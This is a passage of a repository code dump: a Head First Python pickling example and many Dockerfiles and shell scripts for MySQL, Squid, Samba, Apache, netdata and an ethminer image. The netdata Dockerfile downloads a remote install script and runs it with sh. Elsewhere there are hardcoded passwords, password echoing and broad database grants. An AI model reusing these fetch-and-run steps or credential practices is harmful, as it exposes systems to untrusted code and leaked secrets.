"src_encoding": "UTF-8",
"text": "\"\"\"\nThis is the \"nester.py\" module, and it provides one function called print_lol()\nwhich prints lists that may or may not include nested lists.\n\"\"\"\n\ndef print_lol(the_list):\n\tfor each_item in the_list:\n\t\tif isinstance(each_item, list):\n\t\t\tprint_lol(each_item)\n\t\telse:\n\t\t\tprint(each_item)\n"
},
{
"alpha_fraction": 0.7020584940910339,
"alphanum_fraction": 0.7053087949752808,
"avg_line_length": 29.75,
"blob_id": "17306d88e6f9d2e763c58d04b3662fa8ce01c79e",
"content_id": "6e47a5971bb285ede0dc51bbdb7d46f6d3a371a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1846,
"license_type": "no_license",
"max_line_length": 152,
"num_lines": 60,
"path": "/07-putitall/athletemodel.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "import pickle\nfrom athletelist import AthleteList\n\n# two ways of import\n\"\"\"\nimport <module>\nfrom <module> import <variable>or<function>\n\"\"\"\n\ndef get_coach_data(filename):\n\ttry:\n\t\twith open(filename) as f:\n\t\t\tdata = f.readline()\n\t\ttempl = data.strip().split(',')\n\t\treturn(AthleteList(templ.pop(0), templ.pop(0), templ))\n\texcept IOError as ioerr:\n\t\tprint('File error: ' + str(ioerr))\n\t\treturn(None)\n\ndef put_to_store(files_list):\n\tall_athletes = {}\n\tfor each_file in files_list:\n\t\tath = get_coach_data(each_file)\n\t\tall_athletes[ath.name] = ath\n\ttry:\n\t\twith open('athletes.pickle', 'wb') as athf:\n\t\t\tpickle.dump(all_athletes, athf)\n\texcept IOError as ioerr:\n\t\tprint('File error(put_and_store): ' + str(ioerr))\n\treturn(all_athletes)\n\ndef get_from_store():\n\tall_athletes = {}\n\ttry:\n\t\twith open('athletes.pickle', 'rb') as athf:\n\t\t\tall_athletes = pickle.load(athf)\n\texcept IOError as ioerr:\n\t\tprint('File error(get_from_store): ' + str(ioerr))\n\treturn(all_athletes)\n\n#print(dir())\n\nthe_files = ['sarah2.txt', 'james2.txt', 'mikey2.txt', 'julie2.txt']\ndata = put_to_store(the_files)\nprint(data)\n\n# At this point, the athletes.pickle file should appear in the same folder as your code and text files. Recall that this file is a binary file,\n# so trying to view it in IDLE or in your editer is not going to make much sense. To access the data, \n# use the dictionary returned by the put_to_store() or get_from_store() functions.\n\nfor each_athlete in data:\n\tprint(data[each_athlete].name + ' ' + data[each_athlete].dob)\n\n# Use the get_from_store() function to load the pickled data into another dictionary, then confirm that the result are as expected by repeating the code\n# to display each athlete's name and date of birth:\n\ndata_copy = get_from_store()\n\nfor each_athlete in data_copy:\n\tprint(data_copy[each_athlete].name + ' ' + data[each_athlete].dob)\n\n"
}
] | 22 |
reizer-fs/docker
|
https://github.com/reizer-fs/docker
|
e6bd137a93168f3842fb1bf9d6b37da936afafae
|
6325b0fdebe66c0ecb3b37fcde805986ff2b08d2
|
07ac1137861a52c4d528c6ffb277a5990df8e778
|
refs/heads/master
| 2022-12-10T16:12:39.813187 | 2022-02-18T17:38:34 | 2022-02-18T17:38:34 | 67,445,727 | 0 | 0 | null | 2016-09-05T19:25:14 | 2022-02-05T20:57:25 | 2022-12-08T01:55:31 |
Shell
|
[
{
"alpha_fraction": 0.6942148804664612,
"alphanum_fraction": 0.71074378490448,
"avg_line_length": 19.16666603088379,
"blob_id": "1ae7031abc852aba3cd5008c7a206bff64f84c3a",
"content_id": "9b7534126162a003d646b41b6378fab20f77bc7a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 242,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 12,
"path": "/alpine-mysql/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM alpine\n\nRUN apk update && apk add mariadb mariadb-client\nRUN addgroup mysql mysql && rm -rf /var/cache/apk/*\n\nCOPY ./startup.sh /bin/startup.sh\n\nVOLUME [\"/var/lib/mysql\"]\nEXPOSE 3306\nRUN chmod +x /bin/startup.sh\n\nCMD [\"/bin/startup.sh\"]\n"
},
{
"alpha_fraction": 0.6840909123420715,
"alphanum_fraction": 0.6886363625526428,
"avg_line_length": 43,
"blob_id": "31c342730ebb8865d9e563689bfec21eed4bb02b",
"content_id": "33531a4e7a983480abe3930072ca40856542d768",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 440,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 10,
"path": "/alpine-jekyll/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM alpine\n\n# Install base, Ruby, Headers, Jekyll, Export Path and Clean Up\nRUN apk update && apk upgrade && apk add curl wget bash && \\\n apk add ruby ruby-bundler ruby-dev ruby-irb ruby-rdoc libatomic readline readline-dev \\\n libxml2 libxml2-dev libxslt libxslt-dev zlib-dev zlib \\\n libffi-dev build-base git nodejs && \\\n export PATH=\"/root/.rbenv/bin:$PATH\" && \\\n rm -rf /var/cache/apk/* && \\\n gem install github-pages\n"
},
{
"alpha_fraction": 0.7323232293128967,
"alphanum_fraction": 0.7348484992980957,
"avg_line_length": 21,
"blob_id": "847289c53e023937bcdc3d24e0832e918e75c439",
"content_id": "41e6aeb03c0d95d392013e2e1b35b33708cf3103",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 396,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 18,
"path": "/alpine-testssl/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM alpine:latest\n\nRUN apk update && apk upgrade\nRUN apk add bash procps drill git coreutils\n\nRUN addgroup testssl\nRUN adduser -G testssl -g \"testssl user\" -s /bin/bash -D testssl\n\nRUN ln -s /home/testssl/testssl.sh/testssl.sh /usr/local/bin/\n\nUSER testssl\nWORKDIR /home/testssl/\n\nRUN git clone --depth=1 https://github.com/reizer-fs/scripts.git .\n\nENTRYPOINT [\"testssl.sh\"]\n\nCMD [\"/bin/bash\"]\n"
},
{
"alpha_fraction": 0.6179378628730774,
"alphanum_fraction": 0.6242938041687012,
"avg_line_length": 35.30769348144531,
"blob_id": "a0d83fcf0e204c46642ac209e1a1728c89ec6c05",
"content_id": "34fb774f002789f1f5daf76e53d70f66d7f5e813",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1416,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 39,
"path": "/suse-mysql/create_mariadb_admin_user.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nmysql -uroot -e \"status\" > /dev/null 2>&1 || /usr/bin/mysqld_safe > /dev/null 2>&1 &\n\nRET=1\nwhile [[ RET -ne 0 ]]; do\n echo \"=> Waiting for confirmation of MariaDB service startup\"\n sleep 5\n mysql -uroot -e \"status\" > /dev/null 2>&1\n RET=$?\ndone\n\n\necho \"=> Creating MariaDB admin user with $ADMIN_PASS password\"\n\nmysql -uroot -e \"CREATE USER '$ADMIN_USER'@'%' IDENTIFIED BY '$ADMIN_PASS'\"\nmysql -uroot -e \"GRANT ALL PRIVILEGES ON *.* TO '$ADMIN_USER'@'%' IDENTIFIED BY '$RESTRICTED_USER_PASSWORD' WITH GRANT OPTION\"\n\necho \"=> Creating MariaDB $RESTRICTED_USER user with $RESTRICTED_USER_PASSWORD password\"\nmysql -uroot -e \"CREATE USER '$RESTRICTED_USER'@'%' IDENTIFIED BY '$RESTRICTED_USER_PASSWORD'\"\n\nfor DB in $RESTRICTED_DB ; do \nmysql -uroot -e \"CREATE DATABASE $DB\"\nmysql -uroot -e \"GRANT ALL PRIVILEGES ON $DB.* TO '$RESTRICTED_USER'@'%' IDENTIFIED BY '$RESTRICTED_USER_PASSWORD' WITH GRANT OPTION\"\ndone\n\n\necho \"=> Done!\"\n\necho \"========================================================================\"\necho \"You can now connect to this MariaDB Server using:\"\necho \"\"\necho \" mysql -uadmin -p$PASS -h<host> -P<port>\"\necho \"\"\necho \"Please remember to change the above password as soon as possible!\"\necho \"MariaDB user 'root' has no password but only allows local connections\"\necho \"========================================================================\"\n\nmysqladmin -uroot shutdown\n"
},
{
"alpha_fraction": 0.6785110235214233,
"alphanum_fraction": 0.720812201499939,
"avg_line_length": 22.639999389648438,
"blob_id": "1a5d0a67899316225f61322f7fd1bac4b303d891",
"content_id": "87db6f61a9f54985573b901c7bdbd40bfa87ac60",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 591,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 25,
"path": "/suse-squid/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM opensuse:42.2\n\nMAINTAINER Horus \"[email protected]\"\n#ENV http_proxy=http://proxy:8080/\n#ENV https_proxy=http://proxy:8080/\nENV SQUID_VERSION=3.4.4 \\\n SQUID_CACHE_DIR=/var/cache/squid \\\n SQUID_LOG_DIR=/var/log/squid \\\n SQUID_USER=squid\n\n# make sure the repositories are up to date\nRUN zypper ref -s\nRUN zypper in --auto-agree-with-licenses -y squid\n\nEXPOSE 3128\n\nCOPY squid.conf /etc/squid/squid.conf\nCOPY ads.regexp /etc/squid/\nCOPY entrypoint.sh /etc/entrypoint.sh\nRUN chmod 755 /etc/entrypoint.sh\n\nEXPOSE 3128/tcp\nVOLUME [\"${SQUID_CACHE_DIR}\"]\n\nCMD [\"/bin/bash\", \"/etc/entrypoint.sh\"]\n"
},
{
"alpha_fraction": 0.6366508603096008,
"alphanum_fraction": 0.6524486541748047,
"avg_line_length": 23.346153259277344,
"blob_id": "bb42543a57a69e31df14f6357aa64f6105f65516",
"content_id": "2b40841a83d675d1560d08e291e226712e0634db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 633,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 26,
"path": "/suse-ftp/docker-run.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "VIP=\"ftp\"\nENV_DIRECTORY=\"/data/docker/ftp/$VIP\"\nFTP_DIR=\"box downloads\"\nIP_VHOST=`getent hosts $VIP | awk '{print $1}'`\n\nif [ ! -d $ENV_DIRECTORY ] ; then\n\tmkdir -p $ENV_DIRECTORY/shares\n\tmkdir -p $ENV_DIRECTORY/etc/\nfi\n\nif [ \"$(ls -A $ENV_DIRECTORY/etc 2> /dev/null)\" != \"\" ]; then\n\tDOCKER_VOLUMES=\" -v $ENV_DIRECTORY/etc/:/etc/proftpd/\"\nfi\n\nfor i in $FTP_DIR ; do \n\tmkdir -p $ENV_DIRECTORY/shares/$i\n\tDOCKER_VOLUMES=\"$DOCKER_VOLUMES -v $ENV_DIRECTORY/shares/$i:/shares/$i\"\ndone\n\ndocker run -it -h $VIP \\\n--name $VIP \\\n-p $IP_VHOST:20:20 -p $IP_VHOST:21:21 \\\n$DOCKER_VOLUMES \\\n-d suse-ftp \\\n-e USERNAME=ffx \\\n-e PASSWORD=passwd\n"
},
{
"alpha_fraction": 0.7022900581359863,
"alphanum_fraction": 0.7442747950553894,
"avg_line_length": 19.153846740722656,
"blob_id": "370d00b9ea900d8048f183d5e32b1d9064e95a56",
"content_id": "9bb3e62bf0297e59cfcc5131e773fe9a99d28859",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 262,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 13,
"path": "/suse-torrent/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM opensuse:42.2\n\nMAINTAINER Horus \"[email protected]\"\nENV http_proxy=http://proxy:8080/\nENV https_proxy=http://proxy:8080/\nENV TERM=xterm\n\nRUN zypper in -y vim wget tar mlocate rtorrent\nRUN zypper clean -a\n\nCOPY rtorrent.rc /root/.rtorrent.rc\n\nENTRYPOINT [\"/bin/bash\"]\n"
},
{
"alpha_fraction": 0.739393949508667,
"alphanum_fraction": 0.7818182110786438,
"avg_line_length": 35.55555725097656,
"blob_id": "f829c74dfaaf68ed177767b7228f9304b1e31baa",
"content_id": "e3cd2ed911e6e4485f238652e1e011861979866a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 330,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 9,
"path": "/alpine-netdata/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "\nFROM alpine\n\nRUN apk add --no-cache curl sudo\nRUN curl https://my-netdata.io/kickstart-static64.sh >/tmp/kickstart-static64.sh\nRUN yes | sh /tmp/kickstart-static64.sh\n\nENV NETDATA_PORT=19999 SSMTP_TLS=YES SSMTP_SERVER=smtp.gmail.com SSMTP_PORT=587 SSMTP_HOSTNAME=localhost\nEXPOSE $NETDATA_PORT\nCMD \"/opt/netdata/bin/srv/netdata\"\n"
},
{
"alpha_fraction": 0.7469879388809204,
"alphanum_fraction": 0.7603748440742493,
"avg_line_length": 28.8799991607666,
"blob_id": "5789ae82e7d6dfe228de9d544f44c1139f4a8331",
"content_id": "b11fb59e5c07da62ad61b36aaccdd9deda320d07",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 747,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 25,
"path": "/suse-mysql/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM opensuse:42.2\n\nMAINTAINER Horus \"[email protected]\"\n\n# make sure the repositories are up to date\nRUN zypper ref -s\nRUN zypper in -y mariadb\nRUN zypper in -y pwgen\nRUN zypper clean -a\nRUN rm -rf /var/lib/mysql/*\n\n# Add MySQL configuration\nADD create_mariadb_admin_user.sh /etc/create_mariadb_admin_user.sh\nADD entrypoint.sh /etc/entrypoint.sh\nRUN echo \"cat /etc/hostname\" > /usr/bin/hostname\nRUN chmod 775 /usr/bin/hostname /etc/entrypoint.sh /etc/create_mariadb_admin_user.sh\n\n# Add VOLUMEs to allow backup of config and databases\nVOLUME [\"/etc/mysql\", \"/var/lib/mysql\"]\n\n#Added to avoid in container connection to the database with mysql client error message \"TERM environment variable not set\"\nENV TERM xterm\n\nEXPOSE 3306\nCMD [\"/etc/entrypoint.sh\"]\n"
},
{
"alpha_fraction": 0.621026873588562,
"alphanum_fraction": 0.645476758480072,
"avg_line_length": 21.108108520507812,
"blob_id": "28d4a73afac5f22bc52eb3372052fee99ffc3985",
"content_id": "9101165bbdfffd43eea8a1ae1fb3400f49379446",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 818,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 37,
"path": "/debian-kali/docker-run.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n\nhelp () {\n echo \"Usage: $0 hostname type(optional)\"\n\techo \"type = mysql apache squid samba torrent gitlab gcc kali\"\n}\n\nif [ $# -lt 1 ] ; then\n\thelp && exit 1\nfi\n\n\nHOSTNAME=$1\nTYPE=$2\ncase $TYPE in\n\tmysql) CONTAINER=\"suse-mysql\" ; PORTS=\"3306\" ;;\n\tapache)CONTAINER=\"suse-apache\" ; PORTS=\"80 443\";;\n\tsquid) CONTAINER=\"suse-squid\" ; PORTS=\"3128\" ;;\n\tsamba) CONTAINER=\"suse-samba\" ; PORTS=\"\" ;;\n\ttorrent) CONTAINER=\"suse-torrent\";;\n\tgitlab) CONTAINER=\"suse-gitlab\";;\n\tgcc) CONTAINER=\"suse-gcc\";;\n\tkali) CONTAINER=\"kalilinux/kali-linux-docker\";;\n\t*) help && exit 1 ;;\nesac\n\nVIP=`getent hosts $HOSTNAME | awk '{print $1}'`\nENV_DIRECTORY=\"/data/docker/$TYPE/$HOSTNAME\"\n\nif [ ! -d $ENV_DIRECTORY ] ; then\n mkdir -p $ENV_DIRECTORY\nfi\ndocker run -it -d \\\n--name $HOSTNAME \\\n-h $HOSTNAME \\\n$CONTAINER\n"
},
{
"alpha_fraction": 0.7638888955116272,
"alphanum_fraction": 0.7638888955116272,
"avg_line_length": 35,
"blob_id": "b1ace052da2d9bdc4ba63d698cec8a8c0dabb804",
"content_id": "6a775edb6f29fbf945dc2e258ecefd892505315d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 72,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 2,
"path": "/centos-centreon/run.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "chown -R centreon. /usr/share/centreon\nchown -R centreon. /etc/centreon\n"
},
{
"alpha_fraction": 0.6766809821128845,
"alphanum_fraction": 0.7303290367126465,
"avg_line_length": 54.91999816894531,
"blob_id": "33a6f2633419fcd19f38d491c9ea5e8b038d3566",
"content_id": "85e90ea9feb34d6ca298ea065e613f4d9bd89ae5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 1398,
"license_type": "no_license",
"max_line_length": 221,
"num_lines": 25,
"path": "/debian-ethminer/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM ubuntu:focal\n\nENV DEBIAN_FRONTEND=noninteractive\n\nRUN apt update && apt -y upgrade\nRUN apt install -y --no-install-recommends libnuma-dev gnupg2 nano wget ca-certificates python3-pip\n\nRUN wget -q -O - https://repo.radeon.com/rocm/rocm.gpg.key | apt-key add -\nRUN echo 'deb [arch=amd64] https://repo.radeon.com/rocm/apt/debian/ xenial main' | tee /etc/apt/sources.list.d/rocm.list\nRUN apt update\n\nRUN groupadd render\nRUN usermod -a -G video root && usermod -a -G render root\nRUN mkdir --parents /etc/udev/rules.d\nRUN echo 'SUBSYSTEM==\"kfd\", KERNEL==\"kfd\", TAG+=\"uaccess\", GROUP=\"video\"' |tee /etc/udev/rules.d/70-kfd.rules\n\nRUN apt install -y miopen-hip4.0.0 hipblas4.0.0 hipsparse4.0.0 rccl4.0.0 roctracer-dev4.0.0 rocm-libs4.0.0 rocm-smi4.0.0 miopengemm4.0.0\nRUN cp /opt/rocm-4.0.0/hip/lib/libamdhip64.so.4.0.40000 /lib/libamdhip64.so.3\nRUN find /opt/rocm-4.0.0/ -type d | grep 'lib$' > /etc/ld.so.conf.d/rocm.conf\nRUN ldconfig -v\n\nENV ETH_WALLET=<your_ethereum_wallet_address>\nENV WORKERNAME=some_workername\nRUN cd /root && mkdir ethminer && cd ethminer && wget https://github.com/ethereum-mining/ethminer/releases/download/v0.18.0/ethminer-0.18.0-cuda-9-linux-x86_64.tar.gz && tar xzvf ethminer-0.18.0-cuda-9-linux-x86_64.tar.gz\nRUN printf '#!/bin/bash\\n./root/ethminer/bin/ethminer -P stratum1+tcp://${ETH_WALLET}.${WORKERNAME}@eu1.ethpool.org:3333' >> /usr/bin/run_ethminer && chmod +x /usr/bin/run_ethminer\n"
},
{
"alpha_fraction": 0.6447963714599609,
"alphanum_fraction": 0.7285068035125732,
"avg_line_length": 39.181819915771484,
"blob_id": "c5c13c464ea97362bce8bc3493866b338cc192bd",
"content_id": "c9c046f9aa4813aa590828ae2478a681b3e4df4d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 442,
"license_type": "no_license",
"max_line_length": 229,
"num_lines": 11,
"path": "/alpine-php-fpm/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM alpine\n\nRUN apk update && apk add php5-cli php5-fpm php5-mysql\nRUN apk add php5-fpm php5-json php5-zlib php5-xml php5-pdo php5-phar php5-openssl php5-pdo_mysql php5-mysqli php5-gd php5-iconv php5-mcrypt php5-curl php5-opcache php5-ctype php5-apcu php5-intl php5-bcmath php5-dom php5-xmlreader\n\nRUN rm -rf /var/cache/apk/*\n\nRUN sed -i 's/^listen =.*$/listen = 0\\.0\\.0\\.0:9000/g' /etc/php5/php-fpm.conf\nEXPOSE 9000\n\nCMD [\"php-fpm5\", \"-F\"]\n"
},
{
"alpha_fraction": 0.6804191470146179,
"alphanum_fraction": 0.692861795425415,
"avg_line_length": 37.17499923706055,
"blob_id": "59ec36830aaf22ad4c638913822b79bafa257301",
"content_id": "2fa2a977fc7fcf39b76ec35827147978f5f0c0b8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1527,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 40,
"path": "/suse-percona/�!",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nset -e\nchown -R pmm:pmm /opt/prometheus/data && \\\nchown -R pmm:pmm /opt/consul-data\n\n# Prometheus\nif [[ ! \"${METRICS_RESOLUTION:-1s}\" =~ ^[1-5]s$ ]]; then\n echo \"METRICS_RESOLUTION takes only values from 1s to 5s.\"\n exit 1\nfi\nsed -i \"s/1s/${METRICS_RESOLUTION:-1s}/\" /opt/prometheus/prometheus.yml\nsed -i \"s/ENV_METRICS_RETENTION/${METRICS_RETENTION:-720h}/\" /etc/supervisor/supervisord.conf\nsed -i \"s/ENV_METRICS_MEMORY/${METRICS_MEMORY:-262144}/\" /etc/supervisor/supervisord.conf\n\n# Orchestrator\nsed -i \"s/orc_client_user/${ORCHESTRATOR_USER:-orc_client_user}/\" /etc/orchestrator.conf.json\nsed -i \"s/orc_client_password/${ORCHESTRATOR_PASSWORD:-orc_client_password}/\" /etc/orchestrator.conf.json\n\n# Cron\nsed -i \"s/^INTERVAL=.*/INTERVAL=${QUERIES_RETENTION:-8}/\" /etc/cron.daily/purge-qan-data\n\n# SSL\nif [ -e /etc/nginx/ssl/server.crt ] && [ -e /etc/nginx/ssl/server.key ]; then\n sed -i 's/#include nginx-ssl.conf/include nginx-ssl.conf/' /etc/nginx/nginx.conf\n if [ -e /etc/nginx/ssl/dhparam.pem ]; then\n sed -i 's/#ssl_dhparam/ssl_dhparam/' /etc/nginx/nginx-ssl.conf\n fi\nfi\n\n# HTTP basic auth\nif [ -n \"$SERVER_PASSWORD\" ]; then\n echo \"${SERVER_USER:-pmm}:$(openssl passwd -apr1 $SERVER_PASSWORD)\" > /etc/nginx/.htpasswd\n sed -i 's/auth_basic off/auth_basic \"PMM Server\"/' /etc/nginx/nginx.conf\n\n ENV_AUTH_BASIC=\"cfg:default.auth.basic.enabled=false\"\nfi\nsed -i \"s/ENV_AUTH_BASIC/${ENV_AUTH_BASIC}/\" /etc/supervisor/supervisord.conf\n\nsupervisord -c /etc/supervisor/supervisord.conf\n"
},
{
"alpha_fraction": 0.5698234438896179,
"alphanum_fraction": 0.5906901955604553,
"avg_line_length": 43.5,
"blob_id": "4f098a920118e386c4428b4ff2bbaa5b56c229df",
"content_id": "e69791faa10f5f746aa7f67accbb02afb283ea26",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 1246,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 28,
"path": "/suse-samba/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM opensuse:13.2\n\nMAINTAINER Horus \"[email protected]\"\n\nRUN zypper ref -s && zypper --disable-system-resolvables -n in samba\nRUN useradd -c 'Samba User' -d /tmp -M -r smbuser && \\\n sed -i 's|^\\( log file = \\).*|\\1/dev/stdout|' /etc/samba/smb.conf && \\\n sed -i 's|^\\( unix password sync = \\).*|\\1no|' /etc/samba/smb.conf && \\\n sed -i '/Share Definitions/,$d' /etc/samba/smb.conf && \\\n echo ' security = user' >>/etc/samba/smb.conf && \\\n echo ' directory mask = 0775' >>/etc/samba/smb.conf && \\\n echo ' force create mode = 0664' >>/etc/samba/smb.conf && \\\n echo ' force directory mode = 0775' >>/etc/samba/smb.conf && \\\n echo ' force user = smbuser' >>/etc/samba/smb.conf && \\\n echo ' force group = users' >>/etc/samba/smb.conf && \\\n echo ' load printers = no' >>/etc/samba/smb.conf && \\\n echo ' printing = bsd' >>/etc/samba/smb.conf && \\\n echo ' printcap name = /dev/null' >>/etc/samba/smb.conf && \\\n echo ' disable spoolss = yes' >>/etc/samba/smb.conf && \\\n echo ' socket options = TCP_NODELAY' >>/etc/samba/smb.conf && \\\n echo '' >>/etc/samba/smb.conf\n\nRUN zypper clean -a\nCOPY samba.sh /usr/bin/\nRUN chmod +x /usr/bin/samba.sh \nEXPOSE 137 139 445\n\nENTRYPOINT [\"/usr/bin/samba.sh\"]\n"
},
{
"alpha_fraction": 0.6978417038917542,
"alphanum_fraction": 0.7158273458480835,
"avg_line_length": 18.85714340209961,
"blob_id": "29063c488cd7b99756dc3a0e30a9e2775da45b6b",
"content_id": "9e0f530390fb8ef946fe6aaa65375f13c8818c1e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 278,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 14,
"path": "/alpine-nginx/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM alpine\n\nRUN apk update && apk add nginx\nRUN rm -rf /var/cache/apk/*\n\nCOPY nginx.conf /etc/nginx/nginx.conf\n\nVOLUME \"/var/www/localhost/htdocs/\" \nVOLUME \"/etc/nginx/conf.d/\" \nCOPY entrypoint.sh /bin/\nRUN chmod +x /bin/entrypoint.sh\n\nEXPOSE 80 443\nCMD [\"/bin/entrypoint.sh\"]\n"
},
{
"alpha_fraction": 0.7228177785873413,
"alphanum_fraction": 0.768759548664093,
"avg_line_length": 35.27777862548828,
"blob_id": "d465f531edb97fb9d9039bea6ef390d2b2a30412",
"content_id": "c410c76f7dcae3de9969a5aa0ec76caeebbd989e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 653,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 18,
"path": "/suse-apache/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "FROM opensuse:42.2\n\nMAINTAINER Horus \"[email protected]\"\nENV TERM=xterm\n\n# make sure the repositories are up to date\nRUN zypper ref -s && zypper in -y apache2 php5 php5-mysql apache2-mod_php5 php5-json php5-gd php5-dom php5-zlib php5-openssl php5-curl\nRUN zypper clean -a\n\nCOPY vhost.conf /etc/apache2/conf.d/vhost.conf\nCOPY entrypoint.sh /etc/entrypoint.sh\nRUN chmod 755 /etc/entrypoint.sh\nRUN echo \"LoadModule php5_module /usr/lib64/apache2/mod_php5.so\" >> /etc/apache2/loadmodule.conf\nRUN sed -i 's/^DirectoryIndex.*$/DirectoryIndex index.php index.html index.html.var/g' /etc/apache2/httpd.conf\n\nEXPOSE 80/tcp\nEXPOSE 443/tcp\nENTRYPOINT [\"/etc/entrypoint.sh\"]\n"
},
{
"alpha_fraction": 0.5642458200454712,
"alphanum_fraction": 0.6424580812454224,
"avg_line_length": 21.375,
"blob_id": "bfb853141c47fe5ec2841288a3b19dcc0364fd64",
"content_id": "cf69e3fff2df105f3ecdb30cdda72a7ba7c4dbc8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "YAML",
"length_bytes": 179,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 8,
"path": "/docker-compose/squid/docker-compose.yml",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "squid_fx:\n image: alpine-squid\n ports:\n - \"127.0.0.1:3128:3128\"\n environment:\n - \"SQUID_CACHE_DIR=/var/cache/squid\"\n - \"SQUID_LOG_DIR=/var/log/squid\"\n - \"SQUID_USER=squid\"\n"
},
{
"alpha_fraction": 0.6000000238418579,
"alphanum_fraction": 0.6833333373069763,
"avg_line_length": 24.714284896850586,
"blob_id": "138f2bb2d988b018655124723ecc2fe4812f9e9c",
"content_id": "de59fea76d2d5f1490593957658430e5258e188a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 360,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 14,
"path": "/alpine-squid/docker-run.sh",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
"text": "#!/bin/bash -x\n\nNAME=\"alpine-squid\"\nIP_VHOST=\"10.11.66.131 10.11.12.125\"\n\n####\nfor IP in $IP_VHOST ; do\n PORTS_OPTS=\"$PORTS_OPTS -p $IP:3128:3128\"\ndone\n#PORTS_OPTS=\"--publish-all\"\n\npodman run -d -it -h $NAME --name $NAME $VOL_OPTS $PORTS_OPTS localhost/alpine-squid\nsudo firewall-cmd --zone=public --add-port=3128/tcp --permanent\nsudo firewall-cmd --reload\n"
},
{
"alpha_fraction": 0.6532618403434753,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 30.97142791748047,
"blob_id": "b530d15371d33dc54b7c5175bf4ad887aa6e2efd",
"content_id": "643f9119c358bc01352204406de39c10ed9bc3bd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 1119,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 35,
"path": "/alpine-grafana/Dockerfile",
"repo_name": "reizer-fs/docker",
"src_encoding": "UTF-8",
